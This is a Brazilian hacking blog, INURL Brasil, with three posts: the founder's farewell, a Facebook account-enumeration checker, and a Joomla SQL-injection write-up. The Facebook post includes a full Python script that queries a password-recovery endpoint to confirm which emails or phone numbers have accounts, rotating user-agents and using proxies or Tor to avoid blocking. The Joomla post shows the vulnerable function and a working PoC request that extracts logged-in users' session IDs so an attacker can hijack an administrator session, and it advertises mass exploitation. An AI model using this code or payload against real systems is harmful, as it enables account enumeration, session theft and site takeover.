Google INURL - Brasil: advanced search applied through dorks ("sets of search operators") to capture sensitive information and server failures. Group aimed at advanced filters for search engines and digital security research.<br />
<br />
<b>/* H45t4 1á v1st4 INURL BRASIL */ _exit('GoogleINURL', 'Founder');</b> (InurlBR, 2015-11-23)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJwHCp6bn-aaQyFspEtbL9GtI8AtQ1zpnPRDcSN-zgMMWV5-PjxZx-8VANu8nUIDOblVs52JJTDuwy-okgoPjc6tUUY8iCqUZlFX0fyaCJXTHMk-RKuNg0f2GthP0j9DPHBTooqJYFhZDb/s1600/giphy+%25282%2529.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="272" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJwHCp6bn-aaQyFspEtbL9GtI8AtQ1zpnPRDcSN-zgMMWV5-PjxZx-8VANu8nUIDOblVs52JJTDuwy-okgoPjc6tUUY8iCqUZlFX0fyaCJXTHMk-RKuNg0f2GthP0j9DPHBTooqJYFhZDb/s640/giphy+%25282%2529.gif" width="640" /></a></div>
<span style="font-family: Courier New, Courier, monospace;"><br /><?php</span><br />/*<br />
Well folks, I have come to say goodbye... to the <b>INURL BRASIL</b> project.<br />
This journey began in 2010 with the creation of the BLOG: <a href="http://googleinurl.blogspot.com.br/">http://googleinurl.blogspot.com.br</a>, where I always posted some of my studies, scripts and bugs, and opened space for friends to post their work too.<br />
Today, by publishing the scripts I wrote, I managed to get one more Brazilian script into operating systems and toolkits aimed at pentesting:<br />
<b>Parrot OS, Black Arch, Cyborg OS, Weakerthan Linux, Matriux OS, Netool toolkit, Sn1per.</b><br />
<br />
<br />
<ul>
<li>The blog will be closed. I will keep it online, but with no new posts.</li>
<li>The page will stay with the current admins.</li>
<li>The GIT will stay online, but with no new updates.</li>
</ul>
<br />
In this madly programmable world every condition has an end; mine came this year. I am leaving INURL to focus more on my professional career, without setting aside my researcher and coder side. The goal is to always keep evolving.<br />
I leave with a sense of duty fulfilled, or at least the modest thought of having contributed, even if only a few lines of code, to the Brazilian coder scene.<br />
To the current administrators: create your own blogs/sites, something of the kind; use that medium to publish your work and achievements, while still spreading knowledge to the followers of the page (<a href="https://fb.com/InurlBrasil" target="_blank">https://fb.com/InurlBrasil</a>).<br />
<br />
<div style="text-align: center;">
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>Always Thinking Outside The Box...</b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSvyU-e81AW-bJo7WRHWpH5mBUG_E3kNPTDRvDVn-oiar9-WTEgysgK9EWMn_3r8xJ4AXFTbBIIFx6BAFUNbeILew5N8pvWY4b4tNb5nharrIke8EvgbVhCZ2RDw0DN3nuVS_s-PNJyGCa/s1600/thinking_outside_the_box.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Always Thinking Outside The Box..." border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSvyU-e81AW-bJo7WRHWpH5mBUG_E3kNPTDRvDVn-oiar9-WTEgysgK9EWMn_3r8xJ4AXFTbBIIFx6BAFUNbeILew5N8pvWY4b4tNb5nharrIke8EvgbVhCZ2RDw0DN3nuVS_s-PNJyGCa/s640/thinking_outside_the_box.jpg" title="Always Thinking Outside The Box..." width="640" /></a></div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b><br /></b></span>
<i>Thinking outside the box is what drives me; that is why I love creating tools. I hope this way of thinking stays with the page.</i><br />
*/<br /><br />
<span style="font-family: Courier New, Courier, monospace;">require_once('class.inurl.php'); </span><br />
<span style="font-family: Courier New, Courier, monospace;">$objinurl = new Inurl(['Founder' => 'GoogleINURL']); </span><br />
<span style="font-family: Courier New, Courier, monospace;">$objinurl->_exit('23/11/2015'); </span><br />
<br />
#<i> If someone gets hurt using a knife, we do not blame the manufacturer for the injury, but the one who handles the product.</i><br />
<br />
<span style="font-family: Courier New, Courier, monospace;">?></span><br />
<div style="text-align: center;">
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: x-large;"><b>exit('THANK YOU ALL');</b></span></div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEis2kKEB4r8_pmbyufW8qCbBgJc7_PhXGup4zsziJrJwQmjF5l1BvwEA9o5AJLzctJfwaol1Wz8elrydtTyOHLmC5o7rGTCEW1EDbuRleVWKTNsmzLKz3P5pyvOujkVMO2Tfm9HEcFD1Q_6/s1600/giphy+%25283%2529.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="exit('OBRIGADO A TODOS');" border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEis2kKEB4r8_pmbyufW8qCbBgJc7_PhXGup4zsziJrJwQmjF5l1BvwEA9o5AJLzctJfwaol1Wz8elrydtTyOHLmC5o7rGTCEW1EDbuRleVWKTNsmzLKz3P5pyvOujkVMO2Tfm9HEcFD1Q_6/s320/giphy+%25283%2529.gif" title="exit('OBRIGADO A TODOS');" width="320" /></a></div>
<div style="text-align: center;">
<b style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif; font-size: x-large;">Thanks, see ya</b></div>
<br />
<b>Facebook Check - Validating users</b> (InurlBR, 2015-11-15)<br />
I was up late one night with nothing to do when a friend asked me for help with a PHP script whose job was to check accounts on <a href="http://blog.inurl.com.br/search/label/facebook" target="_blank">Facebook</a>.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic90-6Mvi0SVjllrZXxQr5tX4n3JyLc0bdt_rfIaKNBxLftb6Y_5roS3zQAThQn5zA_jhf1O4ZLDwzPpfuJYbsA4zqR1LZApZPgxryBrwBvdvKScWMu-piSVQgEhCWReP4iJqaXjB47tvV/s1600/giphy.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="346" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic90-6Mvi0SVjllrZXxQr5tX4n3JyLc0bdt_rfIaKNBxLftb6Y_5roS3zQAThQn5zA_jhf1O4ZLDwzPpfuJYbsA4zqR1LZApZPgxryBrwBvdvKScWMu-piSVQgEhCWReP4iJqaXjB47tvV/s400/giphy.gif" width="400" /></a></div>
<br />
Who knows, maybe the script, or its logic, will be useful to someone. I do not know who coded the "original"; it had no references, so I added an internal comment with the edit date.<br />
The script was almost "functional", but the request format was not correct... and it was also easily blocked by Facebook.<br />
<i>So I added functions for random user-agents, proxy, proxy-list and Tor proxy, changed the request logic, and added a somewhat "priv8" validation that I found by debugging Facebook's requests until I hit a different way to validate the login.</i><br />
<i><br /></i>
<a href="https://media.giphy.com/media/VOq7EdcJ8UFQA/giphy.gif" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img alt="O script erá quase "funcional", mas a forma de request não estava correta... e também erá bloqueado facilmente pelo facebook. Com isso adicionei functions de user-agent randômicos, proxy, proxy-list, proxy-tor, modifiquei a logica de request e uma validação meio priv8 que fui debugando nos request do Facebook até achar uma maneira diferente de validar a login." border="0" height="285" src="https://media.giphy.com/media/VOq7EdcJ8UFQA/giphy.gif" title="O script erá quase "funcional", mas a forma de request não estava correta... e também erá bloqueado facilmente pelo facebook. Com isso adicionei functions de user-agent randômicos, proxy, proxy-list, proxy-tor, modifiquei a logica de request e uma validação meio priv8 que fui debugando nos request do Facebook até achar uma maneira diferente de validar a login." width="400" /></a><br />
<b><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Enough blah blah, on to the script...</span></b><br />
/*<br />
<pre><b>E d i t i o n </b>- 2.0 / 29-09-2015
-----------------------------</pre>
<pre>AUTHOR: googleINURL
EMAIL: inurlbr@gmail.com
Blog: http://blog.inurl.com.br
TT: https://twitter.com/googleinurl
FB: https://fb.com/InurlBrasil
PTB: http://pastebin.com/u/Googleinurl
GIT: https://github.com/googleinurl
PSS: http://packetstormsecurity.com/user/googleinurl
YB: http://youtube.com/c/INURLBrasil
PLUS: http://google.com/+INURLBrasil
IRC: irc.inurl.com.br / #inurlbrasil
</pre>
<pre><div style="text-align: center;">
-----------------------------------------------------------------------------</div>
*/
<i><span style="font-size: large;">For validation we have to set the source file, which can contain emails or phone numbers.</span></i>
<b><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;">DEBUG SCRIPT:</span></b>
The function <span style="font-family: "courier new" , "courier" , monospace;">geral($email, $proxy = NULL)</span> sends a GET request to the URL <span style="font-family: "courier new" , "courier" , monospace; white-space: normal;">https://www.facebook.com/ajax/login/help/identify.php</span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;"><b>GET parameters:</b></span><span style="font-family: "times new roman";"><span style="white-space: normal;"></span></span></pre>
<span style="font-family: "courier new" , "courier" , monospace;">ctx=recover&lsd=AVrNj_gH&email={$email}&did_submit=Procurar&__user=0&__a=1&__dyn=7xe1JAwZwRyUhxPLHwn84a2i5UdoS1Fx-ewICwPyEjwmE&__req=5&__rev=1959518</span><br />
<br />
If the response page contains the string <span style="font-family: "courier new" , "courier" , monospace;">window.location.href= </span>the identifier belongs to an existing Facebook account; the endpoint answers differently for known and unknown identifiers, which is what makes it an enumeration oracle.<br />
<br />
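The check described above, written out as an added example (not the gist's script) in Python: build the identify.php request, classify the response by the <span style="font-family: "courier new" , "courier" , monospace;">window.location.href=</span> marker, rotate the user-agent and optionally go through a proxy. The endpoint and query parameters are the ones from the debug notes above; the lsd, __dyn and __rev values are the post's captured ones and are almost certainly stale by now. The user-agent strings, the "empty" verdict for blocked requests and the pluggable fetcher are assumptions of this example.

```python
"""Added example (not the post's script): the account-existence check the
post describes, split into a URL builder, a response classifier and a
fetcher so the logic can be exercised offline.

Assumptions, labelled: endpoint and parameter names/values are copied from
the post (captured in 2015, probably stale); the user-agent pool is made up;
an empty body is treated as "blocked/failed" rather than "account unknown".
"""
import random
import urllib.parse
import urllib.request
from typing import Callable, Optional

IDENTIFY_URL = "https://www.facebook.com/ajax/login/help/identify.php"

# Parameters exactly as shown in the post's debug notes.
BASE_PARAMS = {
    "ctx": "recover",
    "lsd": "AVrNj_gH",
    "did_submit": "Procurar",
    "__user": "0",
    "__a": "1",
    "__dyn": "7xe1JAwZwRyUhxPLHwn84a2i5UdoS1Fx-ewICwPyEjwmE",
    "__req": "5",
    "__rev": "1959518",
}

# Constructed user-agent pool (the post rotates UAs; these strings are examples).
USER_AGENTS = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36",
    "Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7",
]

# Marker the post found in the response when the identifier matches an account.
EXISTS_MARKER = "window.location.href="


def build_identify_url(identifier: str) -> str:
    """Return the GET URL for one email address or phone number."""
    params = dict(BASE_PARAMS, email=identifier)
    return IDENTIFY_URL + "?" + urllib.parse.urlencode(params)


def classify(body: str) -> str:
    """Map a response body to 'exists' / 'unknown' / 'empty'.

    'empty' (no body at all) is assumed to mean the request was blocked or
    failed, so it must not be counted as 'account unknown'.
    """
    if not body.strip():
        return "empty"
    return "exists" if EXISTS_MARKER in body else "unknown"


def fetch(url: str, proxy: Optional[str] = None, timeout: float = 15.0) -> str:
    """Default fetcher: urllib with an optional HTTP proxy such as
    'http://127.0.0.1:8118' (an HTTP front-end to Tor). urllib does not speak
    SOCKS, so Tor's 9050 port needs torsocks or an HTTP bridge instead."""
    handlers = []
    if proxy:
        handlers.append(urllib.request.ProxyHandler({"http": proxy, "https": proxy}))
    opener = urllib.request.build_opener(*handlers)
    req = urllib.request.Request(url, headers={
        "User-Agent": random.choice(USER_AGENTS),
        "Accept": "*/*",
        "Referer": "https://www.facebook.com/login/identify?ctx=recover",
    })
    with opener.open(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


def check_accounts(identifiers, proxy=None, fetcher: Callable[..., str] = fetch):
    """Classify each identifier; `fetcher` is injectable so tests run offline."""
    results = {}
    for ident in identifiers:
        try:
            body = fetcher(build_identify_url(ident), proxy)
        except Exception:  # network error, proxy down, HTTP 4xx/5xx
            body = ""
        results[ident] = classify(body)
    return results


if __name__ == "__main__":
    import sys
    targets = [line.strip() for line in open(sys.argv[1]) if line.strip()]
    proxy = sys.argv[2] if len(sys.argv) > 2 else None
    for ident, verdict in check_accounts(targets, proxy).items():
        print(f"[{verdict:>7}] {ident}")
```

Usage: <span style="font-family: "courier new" , "courier" , monospace;">python3 fbcheck.py emails.txt http://127.0.0.1:8118</span>. Keeping the classifier separate from the fetcher is what lets you re-verify the oracle when Facebook changes the response shape: capture one known-good and one known-bad body, and adjust only EXISTS_MARKER.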
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;"><b>At start the script asks for some information:</b></span><br />
<br />
[ ! ] Enter the EMAIL LIST<br />
------------------------------------------------<br />
[ ? ] [ SET FILE ]: {YOUR_FILE}<br />
<br />
[ ! ] Enter the PROXY type<br />
[ 1 ] - TOR<br />
[ 2 ] - MANUAL<br />
[ 3 ] - NO PROXY / DEFAULT<br />
<div>
<div>
--------------------------------------------------</div>
<div>
[ ? ][ SET OP ]: {OPTION}<br />
<br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;"><b>SCREENSHOT:</b></span></div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu6LN7Er2UL8lma2qVMCVL99pfkJGN-i5oMJO5tNozrDEoyJjpMvv-BevcjL6jyYBtggxK13OduS6iM_q_dPA6yYhKYQriMaN4QZ7MuUnyXf3qVd0gDAIoixCs2B7AXzFgIvuVeEYx42tt/s1600/Captura+de+tela+de+2015-11-15+01%253A06%253A25.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="De inicio o script pedi umas informações:" border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu6LN7Er2UL8lma2qVMCVL99pfkJGN-i5oMJO5tNozrDEoyJjpMvv-BevcjL6jyYBtggxK13OduS6iM_q_dPA6yYhKYQriMaN4QZ7MuUnyXf3qVd0gDAIoixCs2B7AXzFgIvuVeEYx42tt/s640/Captura+de+tela+de+2015-11-15+01%253A06%253A25.png" title="De inicio o script pedi umas informações:" width="640" /></a></div>
<div>
<br />
<br />
With all the information set:<br />
<b><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;">SCREENSHOT RUNNING:</span></b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhulbSTvhqVol7WxwSaxcLbqYsJQxE0gsEJjBtMEUBTa0jjqZaUBcprXnTTNi52eaeO7mrbBDuohL5yw4T_vtDY4CbyYTLJv1vqF4n7okGhsuTrUJztF0JP53AsgukRxKscMJbvRLNMroIH/s1600/Captura+de+tela+de+2015-11-15+01%253A34%253A53.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Com todas informações setadas: PRINT EXECUTANDO:" border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhulbSTvhqVol7WxwSaxcLbqYsJQxE0gsEJjBtMEUBTa0jjqZaUBcprXnTTNi52eaeO7mrbBDuohL5yw4T_vtDY4CbyYTLJv1vqF4n7okGhsuTrUJztF0JP53AsgukRxKscMJbvRLNMroIH/s640/Captura+de+tela+de+2015-11-15+01%253A34%253A53.png" title="Com todas informações setadas: PRINT EXECUTANDO:" width="640" /></a></div>
<br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;"><b>DOWNLOAD SCRIPT: </b></span><br />
<a href="https://gist.github.com/googleinurl/3111a343268b5bb72553" target="_blank">https://gist.github.com/googleinurl/3111a343268b5bb72553</a><br />
<br />
<a href="https://media.giphy.com/media/bQoBMCcw60MRa/giphy.gif" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img alt="É isso, mais um script pronto. que pode ajudar alguém em uma logica futura, ou até mesmo em pentest para enumerar usuários de um bando de dados, vai da visão de cada um. Agradecer ao Sebastian Kopp que me cedeu a primeira versão do script para brincar e modificar." border="0" src="https://media.giphy.com/media/bQoBMCcw60MRa/giphy.gif" title="É isso, mais um script pronto. que pode ajudar alguém em uma logica futura, ou até mesmo em pentest para enumerar usuários de um bando de dados, vai da visão de cada um. Agradecer ao Sebastian Kopp que me cedeu a primeira versão do script para brincar e modificar." /></a><i>That is it, one more script done. It may help someone with future logic, or even in a pentest to enumerate the users from a database; it depends on each person's point of view.<br />Thanks to Sebastian Kopp, who gave me the first version of the script to play with and modify.</i><br />
<br />
<b>Thanks, see ya ~</b></div>
<br />
<b>Joomla SQL Injection Vulnerability Exploit Results in Full Administrative Access / inurlbr scanner for mass exploitation</b> (InurlBR, 2015-10-27)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFOzMpQsGDv7h_oMz6XNq_QAot-xCevha3HblYy4nH-mV-DeotjjocG1xX6lF0ZRwbNafl47WMKwZ5_lUNxkptmRTL5_jYwyVg7FtG_jYXiw8RMGv9C_mPv-BVSyuMLFc-d8zVG0rliSIZ/s1600/joomla-website-security.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Trustwave SpiderLabs researcher Asaf Orpani has discovered an SQL injection vulnerability in versions 3.2 through 3.4.4 of Joomla, a popular open-source Content Management System (CMS). Combining that vulnerability with other security weaknesses, our Trustwave SpiderLabs researchers are able to gain full administrative access to any vulnerable Joomla site. Joomla had a 6.6 percent share of the market for website CMSs as of October 20, 2015 according to W3Techs—second only to WordPress. Internet services company BuiltWith estimates that as many as 2.8 million websites worldwide use Joomla. CVE-2015-7297, CVE-2015-7857, and CVE-2015-7858 cover the SQL injection vulnerability and various mutations related to it. CVE-2015-7857 enables an unauthorized remote user to gain administrator privileges by hijacking the administrator session. Following exploitation of the vulnerability, the attacker may gain full control of the web site and execute additional attacks. The vulnerability can be exploited in Joomla versions 3.2 (released in November 2013) through version 3.4.4. Because the vulnerability is found in a core module that doesn't require any extensions, all websites that use Joomla versions 3.2 and above are vulnerable. Asaf also uncovered the related vulnerabilities CVE-2015-7858 and CVE-2015-7297 as part of his research." 
border="0" height="332" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFOzMpQsGDv7h_oMz6XNq_QAot-xCevha3HblYy4nH-mV-DeotjjocG1xX6lF0ZRwbNafl47WMKwZ5_lUNxkptmRTL5_jYwyVg7FtG_jYXiw8RMGv9C_mPv-BVSyuMLFc-d8zVG0rliSIZ/s640/joomla-website-security.png" title="Trustwave SpiderLabs researcher Asaf Orpani has discovered an SQL injection vulnerability in versions 3.2 through 3.4.4 of Joomla, a popular open-source Content Management System (CMS). Combining that vulnerability with other security weaknesses, our Trustwave SpiderLabs researchers are able to gain full administrative access to any vulnerable Joomla site. Joomla had a 6.6 percent share of the market for website CMSs as of October 20, 2015 according to W3Techs—second only to WordPress. Internet services company BuiltWith estimates that as many as 2.8 million websites worldwide use Joomla. CVE-2015-7297, CVE-2015-7857, and CVE-2015-7858 cover the SQL injection vulnerability and various mutations related to it. CVE-2015-7857 enables an unauthorized remote user to gain administrator privileges by hijacking the administrator session. Following exploitation of the vulnerability, the attacker may gain full control of the web site and execute additional attacks. The vulnerability can be exploited in Joomla versions 3.2 (released in November 2013) through version 3.4.4. Because the vulnerability is found in a core module that doesn't require any extensions, all websites that use Joomla versions 3.2 and above are vulnerable. Asaf also uncovered the related vulnerabilities CVE-2015-7858 and CVE-2015-7297 as part of his research." width="640" /></a></div>
<br />
<br />
A flaw in the Joomla CMS that affects more than 2.8 million sites.<br />
Joomla is probably one of the most widely used web content management systems (CMS) for building enterprise-level websites, and it is also widely used for personal websites.<br />
It is open-source software under the GNU/GPL license, maintained by a community of developers organized as a non-profit (Joomla.org).<br />
According to Trustwave, Joomla CMS versions 3.2 to 3.4.4 contain serious security flaws enabling SQL injection attacks that allow an attacker to gain platform administrator privileges.<br />
<br />
Trustwave SpiderLabs researcher <b><a href="https://www.linkedin.com/pub/asaf-orpani/105/878/441/pt" target="_blank">Asaf Orpani </a></b>has discovered an SQL injection vulnerability in versions 3.2 through 3.4.4 of Joomla, a popular open-source Content Management System (<a href="http://blog.inurl.com.br/search/label/cms" target="_blank">CMS</a>). Combining that vulnerability with other security weaknesses, the Trustwave SpiderLabs researchers were able to gain full administrative <b>access</b> to any vulnerable Joomla site.<br />
<br />
Joomla had a 6.6 percent share of the market for website CMSs as of October 20, 2015 according to W3Techs—second only to WordPress. Internet services company BuiltWith estimates that as many as 2.8 million websites worldwide use Joomla.<br />
<br />
<span style="font-family: Courier New, Courier, monospace;">CVE-2015-7297</span>, <span style="font-family: Courier New, Courier, monospace;">CVE-2015-7857</span>, and <span style="font-family: Courier New, Courier, monospace;">CVE-2015-7858</span> cover the SQL injection vulnerability and various mutations related to it.<br />
<br />
<span style="font-family: Courier New, Courier, monospace;">CVE-2015-7857 </span>enables an unauthorized remote user to gain administrator privileges by hijacking the administrator session. Following exploitation of the vulnerability, the attacker may gain full control of the web site and execute additional attacks.<br />
<br />
The vulnerability can be exploited in Joomla versions 3.2 (released in November 2013) through version 3.4.4.<br />
Because the vulnerability is found in a core module that does not require any extensions, every website running Joomla 3.2 through 3.4.4 is vulnerable.<br />
Asaf also uncovered the related vulnerabilities <span style="font-family: Courier New, Courier, monospace;">CVE-2015-7858 </span>and <span style="font-family: Courier New, Courier, monospace;">CVE-2015-7297</span> as part of his research.<br />
<a href="https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/?page=1&year=0&month=0" target="_blank">Trustwave SpiderLabs</a> <i>recommends that ALL Joomla users update their Joomla installations to version 3.4.5.</i><br />
<b>UPDATE:</b><br />
<a href="https://www.joomla.org/announcements/release-news/5634-joomla-3-4-5-released.html" style="font-style: italic;" target="_blank">https://www.joomla.org/announcements/release-news/5634-joomla-3-4-5-released.html</a><br />
<b>Source INFO</b>-> <a href="https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/?page=1&year=0&month=0" target="_blank">[ More Info ]</a><br />
<br />
The following code snippet was found to be vulnerable to <a href="http://blog.inurl.com.br/search/label/sqli" target="_blank">SQLi</a>:<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">PATH: </span></b><span style="font-family: Courier New, Courier, monospace;">/administrator/components/com_contenthistory/models/history.php</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNSV0AIicLGbu5Y5ODkvj735eNKsa6unAn1R2ljphQn8JTXIrnaU1aFe1-VJn9EOFv2Uy64Y6jsM1VsQW_WYZ07ikeKD28tFihZDvjwkq2V2Rz9Vio1asGMgme5En5tYRJH9nok0GqtIah/s1600/6a0133f264aa62970b01bb08850b60970d.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="The vulnerability can be exploited in Joomla versions 3.2 (released in November 2013) through version 3.4.4. Because the vulnerability is found in a core module that doesn't require any extensions, all websites that use Joomla versions 3.2 and above are vulnerable. Asaf also uncovered the related vulnerabilities CVE-2015-7858 and CVE-2015-7297 as part of his research. Trustwave SpiderLabs recommends that ALL Joomla users update their Joomla installations to version 3.4.5. Source-> more info It was found that the following code snippet is vulnerable SQLI: PWD: /administrator/components/com_contenthistory/models/history.php" border="0" height="196" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNSV0AIicLGbu5Y5ODkvj735eNKsa6unAn1R2ljphQn8JTXIrnaU1aFe1-VJn9EOFv2Uy64Y6jsM1VsQW_WYZ07ikeKD28tFihZDvjwkq2V2Rz9Vio1asGMgme5En5tYRJH9nok0GqtIah/s640/6a0133f264aa62970b01bb08850b60970d.png" title="The vulnerability can be exploited in Joomla versions 3.2 (released in November 2013) through version 3.4.4. Because the vulnerability is found in a core module that doesn't require any extensions, all websites that use Joomla versions 3.2 and above are vulnerable. Asaf also uncovered the related vulnerabilities CVE-2015-7858 and CVE-2015-7297 as part of his research. Trustwave SpiderLabs recommends that ALL Joomla users update their Joomla installations to version 3.4.5. Source-> more info It was found that the following code snippet is vulnerable SQLI: PWD: /administrator/components/com_contenthistory/models/history.php" width="640" /></a>
</div>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">FULL FUNCTION:</span></b><br />
<pre>/**
 * <b>Build an SQL query to load the list data.</b>
 *
 * @return JDatabaseQuery
 *
 * @since 3.2
 */
protected function getListQuery()
{
    // Create a new query object.
    $db = $this->getDbo();
    $query = $db->getQuery(true);

    <b>// Select the required fields from the table.
    // 'list.select' is model state populated from the request (list[select]=...)
    // and is concatenated into the query with no quoting or whitelist: this is
    // the injection point used by the PoC below.
    $query->select(
        $this->getState(
            'list.select',
            'h.version_id, h.ucm_item_id, h.ucm_type_id, h.version_note, h.save_date, h.editor_user_id,' .
            'h.character_count, h.sha1_hash, h.version_data, h.keep_forever'
        )
    )</b>
        ->from($db->quoteName('#__ucm_history') . ' AS h')
        ->where($db->quoteName('h.ucm_item_id') . ' = ' . $this->getState('item_id'))
        ->where($db->quoteName('h.ucm_type_id') . ' = ' . $this->getState('type_id'))
        // Join over the users for the editor
        ->select('uc.name AS editor')
        ->join('LEFT', '#__users AS uc ON uc.id = h.editor_user_id');

    // Add the list ordering clause. 'list.ordering' is quoted as an identifier;
    // 'list.direction' is appended as-is.
    $orderCol  = $this->state->get('list.ordering');
    $orderDirn = $this->state->get('list.direction');
    $query->order($db->quoteName($orderCol) . $orderDirn);

    return $query;
}</pre>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>FULL CODE:</b></span><br />
<a href="http://pastebin.com/9FnPuns5" target="_blank">http://pastebin.com/9FnPuns5</a><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>PoC:</b></span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;">REQUEST GET</span><br />
<span style="font-family: Courier New, Courier, monospace;">http://{TARGET}<b>/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM jml_session LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)</b></span><br />
<div>
<br />
<i>It is possible to extract the session IDs (cookies) of users logged into the system and set them in your browser.</i> The table prefix (<span style="font-family: Courier New, Courier, monospace;">jml_</span> in this PoC) is chosen per installation, so it has to be discovered first, for example by leaking <span style="font-family: Courier New, Courier, monospace;">table_name</span> from <span style="font-family: Courier New, Courier, monospace;">information_schema.tables</span> with the same technique. A leaked session is only as privileged as the user it belongs to, so an administrator has to be logged in at the time for the hijack to yield administrator access.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyKQWmtX2Qx973bLM7ZyRR3jNimgkSXBQmm7Vlw6psv1Lcp4YbmMTaYDozsI8mcMiTo5Cg_2HdBSCAYjxFV-N0Mcpn_vt4uzaWBaPmrh3nIJGIzgn16bxxZ_rJQbKw0Z8d-77rqDrStv0U/s1600/6a0133f264aa62970b01bb08850b77970d.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="REQUEST GET http://{TARGET}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1 &list[select]= (select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM jml_session LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) It is possible to extract session ID (cookies) of users logged into the system and set in your browser." border="0" height="376" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyKQWmtX2Qx973bLM7ZyRR3jNimgkSXBQmm7Vlw6psv1Lcp4YbmMTaYDozsI8mcMiTo5Cg_2HdBSCAYjxFV-N0Mcpn_vt4uzaWBaPmrh3nIJGIzgn16bxxZ_rJQbKw0Z8d-77rqDrStv0U/s640/6a0133f264aa62970b01bb08850b77970d.png" title="REQUEST GET http://{TARGET}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1 &list[select]= (select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM jml_session LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) It is possible to extract session ID (cookies) of users logged into the system and set in your browser." width="640" /></a></div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Video demonstration:</b></span><br />
<br />
<iframe allowfullscreen="" frameborder="0" height="450" src="https://www.youtube.com/embed/DOpryDLFSxM" width="100%"></iframe>
<br />
<i>In this article we will work on the SQLi exploitation.</i><br />
<br />
